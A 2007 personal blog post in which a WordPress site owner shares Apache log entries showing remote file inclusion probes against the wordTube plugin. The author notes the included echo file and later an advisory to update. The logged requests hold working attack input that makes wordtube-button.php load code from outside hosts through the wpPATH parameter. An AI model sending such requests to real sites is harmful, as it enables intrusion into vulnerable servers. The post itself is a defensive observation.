wordtube?

Current Mood:Confused emoticon Confused

I saw something interesting in my apache log.

blog.px.ns1.net 72.36.146.234 server.webbyte.com - - [06/May/2007:18:51:22 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pikspiller.dk/stats/format/status.txt? HTTP/1.1" 200 962 "-" "libwww-perl/5.805" mod_deflate: In:- Out:-:-pct.

the file status.txt isn’t malicious, just an echo.

< ? echo "1122548"; ?>


UPDATE
it happened again. with a different host/file this time. Time to toss this plugin??

blog.px.ns1.net 85.119.156.52 power-network.org - - [07/May/2007:23:34:28 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sanwall.info/echo.txt? HTTP/1.1" 200 922 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.

UPDATE2
yeah, there just found an advisory to update to a newer version.

Related posts:

  1. wordtube deleted. OK, over the past week+ after updating this plugin, my...
  2. someone being bad I noticed someone/thing trying to do something nasty to my...
  3. Quickie Howto install the OpenID Wordpress plugin. My friend Dan Spisak was having issues with getting his...
  4. script kiddies go home. Yeesh, another day another set of lame attacks. This [tag]hack...
  5. freebsd notes - compiling and installing using ports # compiling and installing using ports ex. whereis package cd...

This entry was written by px, posted on 2007.05.06 at 7:03 pm PDT, filed under WordPress, blogs, internet, software and tagged , , , . Bookmark the permalink. Follow any comments here with the RSS feed for this post. Post a comment or leave a trackback: Trackback URL.

Post a Comment

Your email is never published nor shared. Required fields are marked *

*
*

Bad Behavior has blocked 1232 access attempts in the last 7 days.